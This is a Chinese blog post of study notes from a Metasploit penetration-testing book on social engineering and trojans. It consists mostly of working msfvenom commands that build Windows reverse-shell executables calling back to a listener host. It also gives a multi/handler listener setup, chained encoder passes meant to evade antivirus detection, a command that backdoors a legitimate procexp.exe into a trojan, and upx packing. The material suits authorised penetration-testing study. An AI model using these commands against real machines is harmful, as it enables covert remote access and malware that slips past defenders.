《Metasploit渗透测试魔鬼训练营》笔记 社会工程学&木马

文章目录

  • 木马
    • msfvenom
    • 使用MSF攻击载荷生成器创建可独立运行的二进制文件
    • 躲避杀毒软件的检测
      • 使用MSF编码器
      • 加壳 upx

社会工程学就是通过分攻击对象的心里弱点,利用人类的本能反应以及人的好奇,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一种攻击手段。
《Metasploit渗透测试魔鬼训练营》笔记 社会工程学&木马_第1张图片

木马

添加链接描述

msfvenom

参数 描述 备注
-p,–paypload 指定payload
–payload-options payload选项
-l ,–list [type] payloads,encoders,nops,all
-n,–nopsled
-f,–format ,–help-formats
-e,–encoder
-a,–arch ,–platform ,–help-platforms 架构平台
-s,–space ,–encoder-space 最大长度
-b,–bad-chars
-i,–iterations encode次数
-c,–add-code Specify an additional win32 shellcode file to include
-x,–template 使用自定义可执行文件 作为模板
-k,–keep 保留原文件功能
-o,–out
-v,–var-name ,–smallest Specify a custom variable name to use for certain output formats, Generate the smallest possible payload

使用MSF攻击载荷生成器创建可独立运行的二进制文件

msfvenom -p windows/shell_reverse_tcp --payload-options
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.200 LPORT=31337 -f exe -o payload1.exe
在Metasploit框架启动监听并在目标机器上运行:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp 
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 10.10.10.200
LHOST => 10.10.10.200
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > run

躲避杀毒软件的检测

使用MSF编码器

msfvenom -l encoders

Name Rank Description
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The “none” Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.200 LPORT=31337 -e x86/shikata_ga_nai -f exe -o payload2.exe

file payload2.exe payload2.exe: PE32 executable (GUI) Intel 80386, for MS Windows

多重编码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=31337 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o payload3.exe

自定义文件模板
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.200 LPORT=31337 -e x86/shikata_ga_nai -x procexp.exe -i 10 -f exe -o pe_backdoor.exe

加壳 upx

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give more help                    -L    display software license
Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress

```upx -5 payload3.exe `

你可能感兴趣的:(《Metasploit渗透测试魔鬼训练营》笔记 社会工程学&木马)